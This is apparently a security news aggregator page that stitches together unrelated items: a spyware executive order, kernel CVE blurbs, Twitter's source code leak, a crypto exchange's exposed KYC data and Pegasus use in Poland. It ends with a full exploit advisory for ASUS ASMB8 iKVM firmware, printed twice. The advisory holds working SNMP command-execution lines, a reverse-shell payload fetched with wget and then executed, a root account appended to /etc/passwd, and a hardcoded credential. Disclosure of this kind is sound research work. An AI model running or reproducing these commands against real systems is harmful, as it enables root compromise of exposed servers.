U.S. President Joe Biden on Monday signed an executive order that restricts the use of commercial spyware by federal government agencies.
The order said the spyware ecosystem "poses significant counterintelligence or security risks to the United States Government or significant risks of improper use by a foreign government or foreign person."
It also seeks to ensure that the government's use of

U.S. President Joe Biden on Monday signed an executive order that restricts the use of commercial spyware by federal government agencies.

The order said the spyware ecosystem "poses significant counterintelligence or security risks to the United States Government or significant risks of improper use by a foreign government or foreign person."

It also seeks to ensure that the government's use of such tools is done in a manner that's "consistent with respect for the rule of law, human rights, and democratic norms and values."

To that end, the order lays out the various criteria under which commercial spyware could be disqualified for use by U.S. government agencies. They include -

*   The purchase of commercial spyware by a foreign government or person to target the U.S. government,
*   A commercial spyware vendor that uses or discloses sensitive data obtained from the cyber surveillance tool without authorization and operates under the control of a foreign government that's engaged in espionage activities aimed at the U.S.,
*   A foreign threat actor that uses commercial spyware against activists and dissidents with the goal of limiting freedom of expression or perpetrating human rights abuses,
*   A foreign threat actor that uses commercial spyware to keep tabs on a U.S. citizen without legal authorization, safeguards, and oversight, and
*   The sales of commercial spyware to governments that have a record of engaging in systematic acts of political repression and other human rights violations.

"This Executive Order will also serve as a foundation to deepen international cooperation to promote responsible use of surveillance technology, counter the proliferation and misuse of such technology, and spur industry reform," the White House said in a statement.

About 50 U.S. government officials in senior positions located in at least 10 countries are estimated to have been infected or targeted by such spyware to date, the Wall Street Journal reported, a number larger than previously known.

While the order stops short of an outright ban, the development comes as sophisticated and invasive surveillance tools are being increasingly deployed to access electronic devices remotely using zero-click exploits and extract valuable information about targets without their knowledge or consent.

Last week, the New York Times reported that Artemis Seaford, a former security policy manager at Meta, had her phone wiretapped and hacked by Greece's national intelligence agency using Predator, a spyware developed by Cytrox.

That said, the order also leaves open the possibility of other kinds of spyware devices, including IMSI catchers, being used by government agencies to glean valuable intelligence.

Viewed in that light, it's also an acknowledgment that the spyware-for-sale industry plays an important role in intelligence-gathering operations even as the technology constitutes a growing counterintelligence and national security risk to government personnel.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

Earlier this month, the Federal Bureau of Investigation (FBI) confirmed that the agency has in the past purchased the location data of U.S. citizens from data brokers as a means to sidestep the traditional warrant process.

The FBI is also alleged to have bought a license for Israeli company NSO Group's Pegasus during 2020 and 2021, acknowledging that it was used for research and development purposes.

The Drug Enforcement Administration (DEA), in a similar fashion, uses Graphite, a spyware tool produced by another Israeli company named Paragon, for counternarcotics operations. It's not immediately not clear if other U.S. federal agencies currently use any commercial spyware.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

President Biden Signs Executive Order Restricting Use of Commercial Spyware

A flaw was found in the Linux kernel. A use-after-free may be triggered in asus_kbd_backlight_set when plugging/disconnecting in a malicious USB device, which advertises itself as an Asus device. Similarly to the previous known CVE-2023-25012, but in asus devices, the work_struct may be scheduled by the LED controller while the device is disconnecting, triggering a use-after-free on the struct asus_kbd_leds *led structure. A malicious USB device may exploit the issue to cause memory corruption with controlled data.

CVE-2023-1079

Indicators point to Twitter's source code being publicly available for around three months, offering a developer security object lesson for businesses.

Some of Twitter's proprietary source code had been publicly available on Github for nearly three months, according to information gleaned from a DMCA Takedown request filed on March 24.

GitHub is the world's largest code hosting platform. Owned by Microsoft, it serves more than 100 million developers and contains nearly 400 million repositories in all.

On March 24, GitHub honored a Twitter employee's request to remove "proprietary source code for Twitter's platform and internal tools." The code had been published in a repository called "PublicSpace," by an individual with the username "FreeSpeechEnthusiast." The name is an apparent reference to Elon Musk's _casus belli_ for taking over Twitter back in October (a philosophy which has been unevenly implemented in months since).

The leaked code was contained in four folders. Though inaccessible as of March 24, some of the folder names — like "auth" and "aws-dal-reg-svc" — seem to give some hint at what they contained within.

    

Source: TorrentFreak

According to Ars Technica, FreeSpeechEnthusiast joined Github on Jan. 3 and committed all the leaked code that same day. That means, in all, the code was entirely accessible to the public for nearly three months.

**How Enterprise Source Code Leaks Happen**

Major software companies are built on millions of lines of code and every so often, for one reason or another, some of it can leak.

"Bad actors, of course, play a major role," says Dwayne McDaniel, developer advocate for GitGuardian. "We saw it last year in cases like Samsung and Uber involving the Lapsus$ group."

Hackers aren't always a part of the story, though. In Twitter's case, circumstantial evidence points to a dissatisfied employee. And "a good deal of it also comes from code ending up where it does not belong unintentionally, as we saw with Toyota, where a subcontractor made a copy of a private codebase public," he adds. "The complexity of working with git and CI/CD combined with an ever-growing number of repos to deal with for modern applications means code on private repos can become public by mistake."

**The Problem of Source Code Leaks for Enterprises**

For Twitter and companies like it, source code leaks can be a much bigger problem for cybersecurity than copyright infringement. Once a private repository becomes public, all kinds of harm can follow.

"It's important to remember that source repositories often contain more than just the code," notes Tim Mackey, principal security strategist for the Synopsys Cybersecurity Research Center. "You'll find test cases, potentially sample data along with details on how the software should be configured."

There may also be sensitive personal information and authentication information hidden in the code. For example, "for some applications that are never intended to be shipped to customers, the default configuration contained in the source code repository might just be the running configuration," Mackey says. Hackers can use stolen authentication and configuration data to carry out bigger and better attacks against the victim of a leak.

That's why "companies should adopt a more secure secrets management strategy, combining secrets storage with secrets detection," says GitGuardian's McDaniel. "Organizations should also audit their current secret\[s\] leakage situation to know what systems are at risk if a code leak does occur and where to focus prioritization."

But in cases where the leak comes from the inside — like Twitter's — even greater caution is warranted. It requires thorough threat modeling and analysis of an enterprise's source code management, says Mackey.

"This is important because if someone can trigger a source code leak, then they may also have the ability to change the source code," he says. "If you're not using multifactor authentication for access, enforcing limited access to only approved users, enforcing access rights, and access monitoring, then you may not have a full picture of how someone might exploit the assumptions your development teams have made when they secured their source code repository."

Twitter's Source Code Leak on GitHub a Potential Cyber Nightmare

A use-after-free flaw was found in the Linux kernel’s Ext4 File System in how a user triggers several file operations simultaneously with the overlay FS usage. This flaw allows a local user to crash or potentially escalate their privileges on the system. Only if patch 9a2544037600 ("ovl: fix use after free in struct ovl_aio_req") not applied yet, the kernel could be affected.

CVE-2023-1252: [PATCH 5.15 138/917] ovl: fix use after free in struct ovl_aio_req

In the Linux kernel before 6.1.3, fs/ntfs3/inode.c does not validate the attribute name offset. An unhandled page fault may occur.

CVE-2022-48424

By Habiba Rashid
The database was exposed due to a misconfigured AWS S3 bucket.
This is a post from HackRead.com Read the original post: Crypto exchange Fiatusdt leaked trove of users KYC data

****The server was exposed to the public without any password or security authentication, allowing access to tens of thousands of passport and ID card copies.****

In recent news, Jeremiah Fowler of Website Planet discovered an exposed database belonging to the online currency exchange platform, Fiatusdt. The database contained **cryptocurrency** sales records, including customer names, bank account numbers, purchase and sales records, and other sensitive information.

Online currency exchanges are internet-based platforms that facilitate the transfer of currencies for distribution in a stable, centralized setting between countries or companies. Like their physical counterparts, online currency exchanges make money by charging a nominal fee and/or through the bid-ask spread in a currency.

Amongst the exposed information were Know Your Customer (**KYC**) compliance records and identification images, which were particularly concerning as they contained sensitive information that proved the identity of customers.

Fowler reported having viewed as many as 20,000 passport and identity card images. The customer ID documents appeared to belong to individuals from all over the world, including the following countries:

1.  Oman
2.  China
3.  India
4.  Malaysia
5.  Australia
6.  Indonesia
7.  Singapore and others.

According to Website Planet’s **blog post**, it is still unclear how many users were affected by the data leak since the total number of records could not be seen, and whether or not the exposed records were accessed by anyone before being discovered.

Publically leaked folders and one of the ID cards (Image credit: Website Planet)

The database also contained screenshots of deposit and withdrawal amounts, which exposed bank transfer records identifying customer names, account numbers, email addresses, phone numbers, and other sensitive information.

Additionally, transaction IDs and wallet addresses for transactions were present in the database.

This database was exposed due to a **misconfigured AWS storage** name and address, which allowed public access. This resulted in the database being open and accessible to anyone with an internet connection.

The company was notified of the breach through a responsible disclosure notice, and public access to the database was subsequently closed.

1.  **Cryptoworm infecting AWS Cloud to mine cryptocurrency**
2.  **350M email IDs exposed on misconfigured AWS S3 bucket**
3.  **Pegasus Airlines Leaked 6.5TB Data in AWS Bucket Mess Up**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Crypto exchange Fiatusdt leaked trove of users KYC data

A mayor backing Polish opposition elections in parliament has been targeted by special services with Pegasus spyware.

Polish special services reportedly used the infamous Pegasus mobile spyware to monitor the phone of a mayor backing government opposition, according to a new report.

Polish liberal news outlet Gazeta Wyborcza, characterized by Reuters as being openly against the county's ruling "PiS" nationalists, reported while Sopot mayor Jacek Karnowski was working to elect opposition candidates in Poland's upper house of Parliament between 2018 and 2019, he was targeted by Israel-based NSO Group's Pegasus spyware. The report added that Karnowski's name was also discovered on a list of targets hacked with Pegasus spyware by Poland's special services.

"We will not allow the PiS machine to further destroy democracy, lead Poland to the East and sovietise our country," Karnowski told Reuters in reaction to the report. "The politicians who inspired and commissioned these activities belong in prison."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Polish Politician's Phone Patrolled by Pegasus

Sudo before 1.9.13p2 has a double free in the per-command chroot feature.

CVE-2023-27320: Stable Release

ASUS ASMB8 iKVM firmware versions 1.14.51 and below suffers from a flaw where SNMPv2 can be used with write access to introduce arbitrary extensions to achieve remote code execution as root. The researchers also discovered a hardcoded administrative account.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
# Exploit Title:        ASUS ASMB8 iKVM RCE and SSH Root Access  
# Date:                 2023-02-16  
# Exploit Author:       d1g@segfault.net for NetworkSEC [NWSSA-002-2023]  
# Vendor Homepage:      https://servers.asus.com/search?q=ASMB8  
# Version/Model:        ASMB8 iKVM Firmware <= 1.14.51 (probably others)  
# Tested on:            Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl  
# CVE:                  CVE-2023-26602  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++++++++++  
0x00    DESCRIPTION  
++++++++++++++++++++

During a recent engagement, a remote server management interface has been   
discovered. Furthermore, SNMPv2 was found to be enabled, offering write  
access to the private community, subsequently allowing us to introduce  
SNMP arbitrary extensions to achieve RCE.

We also found a hardcoded account sysadmin:superuser by cracking the   
shadow file (md5crypt) found on the system and identifed an "anonymous"  
user w/ the same password, however a lock seems to be in place to prevent  
using these credentials via SSH (running defshell as default shell).

+++++++++++++++  
0x01    IMPACT  
+++++++++++++++

By exploiting SNMP arbitrary extension, we are able to run any command on  
the system w/ root privileges, and we are able to introduce our own user  
circumventing the defshell restriction for SSH.

+++++++++++++++++++++++++++++++  
0x02    PROOF OF CONCEPT (PoC)  
+++++++++++++++++++++++++++++++

At first, we have to create required extensions on the system, e.g. via

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "[command]"'

and if everything is set, we can just run that command by

snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects

which will execute our defined command and show us its output.

+++++++++++++++++++++++++++++++  
0x03    SSH Remote Root Access  
+++++++++++++++++++++++++++++++

The identified RCE can be used to transfer a reverse tcp shell created  
by msfvenom for arm little-endian, e.g.

msfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin

We can now transfer the binary, adjust permissions and finally run it:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"'  
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"'  
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"'

Again, we have to request execution of the lines in the MIB via:

snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects

We get a reverse connection from the host, and can now act on the local system   
to easily echo our own line into /etc/passwd:

echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd

By setting the standard shell to /bin/sh, we are able to get a SSH root  
shell into the system, effectively circumventing the defshell restriction.

$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g

BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash)  
Enter 'help' for a list of built-in commands.

# uname -a  
Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown  
# uptime  
 15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25  
# head -n 1 /etc/shadow  
sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7:::

---

#EOF

ASUS ASMB8 iKVM 1.14.51 SNMP Remote Root

ASUS ASMB8 iKVM firmware through 1.14.51 allows remote attackers to execute arbitrary code by using SNMP to create extensions, as demonstrated by snmpset for NET-SNMP-EXTEND-MIB with /bin/sh for command execution.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Exploit Title: AMI/ASUS ASMB8 iKVM RCE and SSH Root Access # Date: 2023-02-16 # Exploit Author: d1g@segfault.net for NetworkSEC \[NWSSA-002-2023\] # Vendor Homepage: https://servers.asus.com/search?q=ASMB8 # Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others) # Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl # CVE: Currently Unassigned (CVE-2023-XXXXX) ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++ 0x00 DESCRIPTION ++++++++++++++++++++ During a recent engagement, a remote server management interface has been discovered. Furthermore, SNMPv2 was found to be enabled, offering write access to the private community, subsequently allowing us to introduce SNMP arbitrary extensions to achieve RCE. We also found a hardcoded account sysadmin:superuser by cracking the shadow file (md5crypt) found on the system and identifed an "anonymous" user w/ the same password, however a lock seems to be in place to prevent using these credentials via SSH (running defshell as default shell). +++++++++++++++ 0x01 IMPACT +++++++++++++++ By exploiting SNMP arbitrary extension, we are able to run any command on the system w/ root privileges, and we are able to introduce our own user circumventing the defshell restriction for SSH. +++++++++++++++++++++++++++++++ 0x02 PROOF OF CONCEPT (PoC) +++++++++++++++++++++++++++++++ At first, we have to create required extensions on the system, e.g. via snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "\[command\]"' and if everything is set, we can just run that command by snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects which will execute our defined command and show us its output. +++++++++++++++++++++++++++++++ 0x03 SSH Remote Root Access +++++++++++++++++++++++++++++++ The identified RCE can be used to transfer a reverse tcp shell created by msfvenom for arm little-endian, e.g. msfvenom -p linux/armle/shell\_reverse\_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin We can now transfer the binary, adjust permissions and finally run it: snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"' snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"' snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"' Again, we have to request execution of the lines in the MIB via: snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects We get a reverse connection from the host, and can now act on the local system to easily echo our own line into /etc/passwd: echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd By setting the standard shell to /bin/sh, we are able to get a SSH root shell into the system, effectively circumventing the defshell restriction. $ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. # uname -a Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown # uptime 15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25 # head -n 1 /etc/shadow sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7::: --- #EOF

Tag

#asus